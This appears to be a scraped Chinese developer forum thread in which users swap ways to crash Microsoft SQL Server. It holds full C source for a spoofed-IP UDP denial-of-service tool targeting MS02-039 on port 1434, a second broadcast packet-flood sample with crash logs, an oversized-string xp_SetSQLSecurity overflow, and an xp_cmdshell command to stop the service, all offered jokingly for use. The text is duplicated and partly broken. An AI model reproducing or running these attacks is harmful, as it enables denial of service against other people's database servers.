这句话为什么不对哪 急 急! exec xp_SetSQLSecurity 'aa','bb','...10K的字符串','dd'保证sql溢出,哈哈。。哈哈。。 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 呵呵 你用的是sql 2000吧要改为exec master..xp_cmdshell 'net stop mssqlserver'sql 7 下用net stop sqlserver的 呵呵 大力的办法好 干脆搞暴sql 收藏收藏 哈哈。。哈哈。。AR利用SQLSERVER的UDP溢出的DOS程序源代码 (阅览 466 次)////////////////////////////////////////////////////////////// // SQL Overflow dos tool//// Reference: MS02-039//// Author: refdom// Email: [email protected]// Homepage: www.opengram.com//////////////////////////////////////////////////////////////#include <string.h>#include <stdio.h>#include <process.h>#include <winsock2.h>#include <ws2tcpip.h>#pragma comment(lib,"ws2_32.lib")#define SOURCE_PORT 53#define DEST_PORT 1434typedef struct ip_hdr //定义IP首部{unsigned char h_verlen; //4位首部长度,4位IP版本号unsigned char tos; //8位服务类型TOSunsigned short total_len; //16位总长度(字节)unsigned short ident; //16位标识unsigned short frag_and_flags; //3位标志位unsigned char ttl; //8位生存时间 TTLunsigned char proto; //8位协议 (TCP, UDP 或其他)unsigned short checksum; //16位IP首部校验和unsigned int sourceIP; //32位源IP地址unsigned int destIP; //32位目的IP地址}IP_HEADER;struct //定义TCP伪首部{unsigned long saddr; //源地址unsigned long daddr; //目的地址char mbz;char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header;typedef struct tcp_hdr //定义TCP首部{USHORT th_sport; //16位源端口USHORT th_dport; //16位目的端口unsigned int th_seq; //32位序列号unsigned int th_ack; //32位确认号unsigned char th_lenres; //4位首部长度/6位保留字unsigned char th_flag; //6位标志位USHORT th_win; //16位窗口大小USHORT th_sum; //16位校验和USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER;typedef struct udp_hdr //UDP首部{unsigned short sourceport; unsigned short destport; unsigned short udp_length; unsigned short udp_checksum; } UDP_HEADER;//CheckSum:计算校验和的子函数USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0;while(size >1){cksum+=*buffer++;size -=sizeof(USHORT);}if(size ) {cksum += *(UCHAR*)buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >>16);return (USHORT)(~cksum);} void Usage(){printf("******************************************\n");printf("SQLOverFlowDOS(MS02-039)\n");printf("\t Written by Refdom\n");printf("\t Email: [email protected]\n");printf("\t Homepage: www.opengram.com\n");printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");printf("*******************************************\n");}void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP){SOCKET sock;SOCKADDR_IN addr_in;BOOL flag;char buf[80] = {0};IP_HEADER ipHeader;UDP_HEADER udpHeader;int iTotalSize, iUdpCheckSumSize, i, j;char sendbuf[256] = {0};char *ptr = NULL;memset(buf, 'A', sizeof(buf) - 2);buf[0] = 0x04;sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);if (sock == INVALID_SOCKET){printf("socket Error!\n");return;}flag = true;if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR){printf("setsockopt Error!\n");return;}iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));ipHeader.tos=0;ipHeader.total_len=htons(iTotalSize);ipHeader.ident=0;ipHeader.frag_and_flags=0;ipHeader.ttl=128;ipHeader.proto=IPPROTO_UDP;ipHeader.checksum=0;ipHeader.sourceIP = ulFakeIP;ipHeader.destIP = ulTargetIP;udpHeader.sourceport = htons(SOURCE_PORT);udpHeader.destport = htons(DEST_PORT);udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));udpHeader.udp_checksum = 0;ptr = NULL;//计算UDP校验和ZeroMemory(sendbuf,sizeof(sendbuf));ptr=sendbuf;iUdpCheckSumSize=0;udpHeader.udp_checksum = 0;memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));ptr +=sizeof(ipHeader.sourceIP);iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));ptr +=sizeof(ipHeader.destIP);iUdpCheckSumSize +=sizeof(ipHeader.destIP);ptr++;iUdpCheckSumSize++;memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));ptr +=sizeof(ipHeader.proto);iUdpCheckSumSize +=sizeof(ipHeader.proto);memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));ptr +=sizeof(udpHeader.udp_length);iUdpCheckSumSize +=sizeof(udpHeader.udp_length);memcpy(ptr,&udpHeader,sizeof(udpHeader));ptr +=sizeof(udpHeader);iUdpCheckSumSize += sizeof(udpHeader);for(i = 0; i < sizeof(buf); i++,ptr++)*ptr = buf[i];iUdpCheckSumSize += sizeof(buf);udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);ZeroMemory(sendbuf,sizeof(sendbuf));memcpy(sendbuf,&ipHeader,sizeof(ipHeader));memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));addr_in.sin_family = AF_INET;addr_in.sin_port = htons(DEST_PORT);addr_in.sin_addr.S_un.S_addr = ulTargetIP ;printf("\n Starting send packet\n\t");for (j = 0; j < 5; j++){Sleep(500);if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR){printf("Send Error!\n");return;}else{printf(".");}}printf("\n Send OK!\n");if (sock != INVALID_SOCKET)closesocket(sock);}int main(int argc, char* argv[]){WSADATA WSAData;unsigned long ulTargetIP, ulFakeIP;Usage();if (argc < 3){return false;}ulTargetIP = inet_addr(argv[1]);ulFakeIP = inet_addr(argv[2]);if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0){printf("WSAStartup error.Error:%d\n",WSAGetLastError());return false;}printf("DOS starting ...\n");Sendudp(ulTargetIP, ulFakeIP);printf("\nComplete!\n");WSACleanup();return 0;} ok 试试看 pengdali(大力) 的等老大不在的时候我会试的,不然。^_^ 多谢pengdali 你先在文本编辑器里疯狂拷贝40K-50K的文字在全选粘贴到查询分析器里写入:exec xp_SetSQLSecurity 'aa','bb','粘贴到这','aa'决对搞定!!我试过N次了!! 用UDP给SQL SERVER的1433发送SQL SERVER信息发送的特定的0x8开头的信包会导致SQL SERVER当机:演示代码如下 参数:跟SQL SERVER服务器的IP或广播地址的IP int main(int argc, char* argv[]) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; char buf[1024]={'\x08','\x00'}; HANDLE listener; const int SNDBUF = 0; const int TCPNODELAY = TRUE; const int BROADCAST = TRUE; if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { return FALSE; } if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) { return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(1434); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR) { return FALSE; } if (setsockopt(sock, SOL_SOCKET, TCP_NODELAY, (const char*)&TCPNODELAY, sizeof(TCPNODELAY))==SOCKET_ERROR) { return FALSE; } if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR) { return FALSE; } for(j=0;j〈256;j++) { buf[1]=j; sendto(sock, buf, sizeof(buf), 0,(SOCKADDR*) &addr_in, sizeof(addr_in))==SOCKET_ERROR) Sleep(100); } WSACleanup(); return 0; } BUF中放置08开头的,后面一个字节从0到255,都可以引起SQL SERVER服务器的当掉。返回的SQL SERVER日志信息是: 2002-09-04 12:50:17.21 server SqlDumpExceptionHandler: 进程 2020 发生了严重的异常 c0000005 EXCEPTION_ACCESS_VIOLATION。SQL Server 将终止该进程。 2002-09-04 12:50:17.64 server SQL Server 将终止。发生了严重的异常 c0000005。 如果没有启动sql agant服务,这SQL SERVER服务器需要人工手动启动,如果启动了了SQL AGANT,SQL SERVER服务器会在3秒以后自动恢复。 但是可以不断的发起这样的包达到拒绝服务的目的,同时由于该协议是UDP协议,可以轻易的使用IP欺骗发起攻击,在还可以使用广播一次使得多个SQL SERVER受到攻击。 测试环境: SQL SERVER 2000+SP2 WINDOWS 2000 SERVER+SP3,ADV SERVER+SP3,professional+SP2 查询上级、同级、下级 win7(64位系统) 下安装sql2008数据库,安装配置完毕后,输入创建的用户无法登陆 这样的SQL语法写的很烂,大家看看怎么写漂亮一点 字段的顺序加1的问题 C# txt文件导入SQL数据表 如何查询一列字符串包含另一列字符串的记录 二个数据库中二个视图如何同步? 求一存储过程 postgresql的问题 sql表中汉字字段以“,”分隔,怎样添加一个对应字段。 如何显示存储过程内容? 请问怎样返回前N条记录?
要改为exec master..xp_cmdshell 'net stop mssqlserver'sql 7 下用net stop sqlserver的
//
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: [email protected]
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>#pragma comment(lib,"ws2_32.lib")#define SOURCE_PORT 53
#define DEST_PORT 1434typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;struct //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;typedef struct tcp_hdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;typedef struct udp_hdr //UDP首部
{
unsigned short sourceport;
unsigned short destport;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HEADER;//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
} void Usage()
{
printf("******************************************\n");
printf("SQLOverFlowDOS(MS02-039)\n");
printf("\t Written by Refdom\n");
printf("\t Email: [email protected]\n");
printf("\t Homepage: www.opengram.com\n");
printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
printf("*******************************************\n");
}void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
{SOCKET sock;
SOCKADDR_IN addr_in;
BOOL flag;
char buf[80] = {0};
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int iTotalSize, iUdpCheckSumSize, i, j;
char sendbuf[256] = {0};
char *ptr = NULL;memset(buf, 'A', sizeof(buf) - 2);
buf[0] = 0x04;sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if (sock == INVALID_SOCKET)
{
printf("socket Error!\n");
return;
}flag = true;
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt Error!\n");
return;
}iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
ipHeader.sourceIP = ulFakeIP;
ipHeader.destIP = ulTargetIP;udpHeader.sourceport = htons(SOURCE_PORT);
udpHeader.destport = htons(DEST_PORT);
udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
udpHeader.udp_checksum = 0;ptr = NULL;//计算UDP校验和
ZeroMemory(sendbuf,sizeof(sendbuf));
ptr=sendbuf;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
ptr +=sizeof(ipHeader.sourceIP);
iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
ptr +=sizeof(ipHeader.destIP);
iUdpCheckSumSize +=sizeof(ipHeader.destIP);ptr++;
iUdpCheckSumSize++;memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
ptr +=sizeof(ipHeader.proto);
iUdpCheckSumSize +=sizeof(ipHeader.proto);memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
ptr +=sizeof(udpHeader.udp_length);
iUdpCheckSumSize +=sizeof(udpHeader.udp_length);memcpy(ptr,&udpHeader,sizeof(udpHeader));
ptr +=sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader);for(i = 0; i < sizeof(buf); i++,ptr++)
*ptr = buf[i];
iUdpCheckSumSize += sizeof(buf);udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);ZeroMemory(sendbuf,sizeof(sendbuf));
memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(DEST_PORT);
addr_in.sin_addr.S_un.S_addr = ulTargetIP ;printf("\n Starting send packet\n\t");for (j = 0; j < 5; j++)
{
Sleep(500);
if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
{
printf("Send Error!\n");
return;
}
else
{
printf(".");
}
}printf("\n Send OK!\n");if (sock != INVALID_SOCKET)
closesocket(sock);
}int main(int argc, char* argv[])
{
WSADATA WSAData;
unsigned long ulTargetIP, ulFakeIP;Usage();if (argc < 3)
{
return false;
}ulTargetIP = inet_addr(argv[1]);
ulFakeIP = inet_addr(argv[2]);if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return false;
}printf("DOS starting ...\n");Sendudp(ulTargetIP, ulFakeIP);printf("\nComplete!\n");
WSACleanup();return 0;
}
pengdali(大力) 的等老大不在的时候我会试的,不然。
^_^ 多谢pengdali
exec xp_SetSQLSecurity 'aa','bb','粘贴到这','aa'
决对搞定!!我试过N次了!!
参数:跟SQL SERVER服务器的IP或广播地址的IP
int main(int argc, char* argv[])
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf[1024]={'\x08','\x00'};
HANDLE listener;
const int SNDBUF = 0;
const int TCPNODELAY = TRUE;
const int BROADCAST = TRUE; if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
return FALSE;
} if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
{
return FALSE;
} addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(1434);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR)
{
return FALSE;
}
if (setsockopt(sock, SOL_SOCKET, TCP_NODELAY, (const char*)&TCPNODELAY, sizeof(TCPNODELAY))==SOCKET_ERROR)
{
return FALSE;
}
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR)
{
return FALSE;
} for(j=0;j〈256;j++)
{
buf[1]=j;
sendto(sock, buf, sizeof(buf), 0,(SOCKADDR*) &addr_in, sizeof(addr_in))==SOCKET_ERROR)
Sleep(100);
}
WSACleanup();
return 0;
}
BUF中放置08开头的,后面一个字节从0到255,都可以引起SQL SERVER服务器的当掉。返回的SQL SERVER日志信息是:
2002-09-04 12:50:17.21 server SqlDumpExceptionHandler: 进程 2020 发生了严重的异常 c0000005 EXCEPTION_ACCESS_VIOLATION。SQL Server 将终止该进程。
2002-09-04 12:50:17.64 server SQL Server 将终止。发生了严重的异常 c0000005。
如果没有启动sql agant服务,这SQL SERVER服务器需要人工手动启动,如果启动了了SQL AGANT,SQL SERVER服务器会在3秒以后自动恢复。
但是可以不断的发起这样的包达到拒绝服务的目的,同时由于该协议是UDP协议,可以轻易的使用IP欺骗发起攻击,在还可以使用广播一次使得多个SQL SERVER受到攻击。 测试环境:
SQL SERVER 2000+SP2
WINDOWS 2000 SERVER+SP3,ADV SERVER+SP3,professional+SP2